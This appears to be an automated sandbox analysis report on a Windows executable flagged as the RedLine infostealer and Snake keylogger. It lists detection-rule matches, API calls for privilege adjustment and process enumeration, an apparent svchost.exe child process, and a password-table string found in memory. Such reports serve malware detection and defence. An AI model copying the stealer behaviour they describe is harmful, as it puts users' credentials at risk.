Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E1E98	2_2_091E1E98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091ED119	2_2_091ED119
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091ED128	2_2_091ED128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E257D	2_2_091E257D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091ED570	2_2_091ED570
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091ED580	2_2_091ED580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091ED9D8	2_2_091ED9D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091ED9C8	2_2_091ED9C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E0006	2_2_091E0006
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E5038	2_2_091E5038
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EF832	2_2_091EF832
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E0040	2_2_091E0040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EF840	2_2_091EF840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EFC98	2_2_091EFC98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091ECCC0	2_2_091ECCC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EEB38	2_2_091EEB38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EEB29	2_2_091EEB29
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E0B20	2_2_091E0B20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E9358	2_2_091E9358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E179F	2_2_091E179F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EEF90	2_2_091EEF90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EEF80	2_2_091EEF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E8BB1	2_2_091E8BB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EF3D7	2_2_091EF3D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E8BC0	2_2_091E8BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EF3E8	2_2_091EF3E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EDE1F	2_2_091EDE1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EDE30	2_2_091EDE30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EE27A	2_2_091EE27A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E1E8B	2_2_091E1E8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EE288	2_2_091EE288
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EE6D0	2_2_091EE6D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091EE6E0	2_2_091EE6E0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: String function: 00257DE1 appears 35 times
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: String function: 00278900 appears 42 times
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: String function: 00270AE3 appears 70 times

Source: BgroUcYHpy.exe, 00000000.00000003.2054734873.000000000401D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs BgroUcYHpy.exe
Source: BgroUcYHpy.exe, 00000000.00000003.2056474199.0000000003E73000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs BgroUcYHpy.exe
Source: BgroUcYHpy.exe, 00000000.00000002.2057269694.0000000001360000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs BgroUcYHpy.exe

Source: BgroUcYHpy.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.BgroUcYHpy.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4483603541.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.2057269694.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 2.2.svchost.exe.7d00000.4.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svchost.exe.7d00000.4.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svchost.exe.7d00000.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svchost.exe.7940f20.2.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svchost.exe.7940f20.2.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svchost.exe.7940f20.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.svchost.exe.3259f20.1.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.svchost.exe.3259f20.1.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002BA06A GetLastError,FormatMessageW,

0_2_002BA06A

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002A81CB AdjustTokenPrivileges,CloseHandle,		0_2_002A81CB
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002A87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_002A87E1

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002BB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_002BB333

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002CEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_002CEE0D

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002C83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_002C83BB

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_00254E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00254E89

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

File created: C:\Users\user\AppData\Local\Temp\aut5707.tmp

Jump to behavior

Source: BgroUcYHpy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000002.00000002.4484780955.0000000005614000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005647000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005622000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2251464383.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005654000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: BgroUcYHpy.exe

ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Users\user\Desktop\BgroUcYHpy.exe "C:\Users\user\Desktop\BgroUcYHpy.exe"
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BgroUcYHpy.exe"
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BgroUcYHpy.exe"	Jump to behavior

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Section loaded: wininet.dll	Jump to behavior
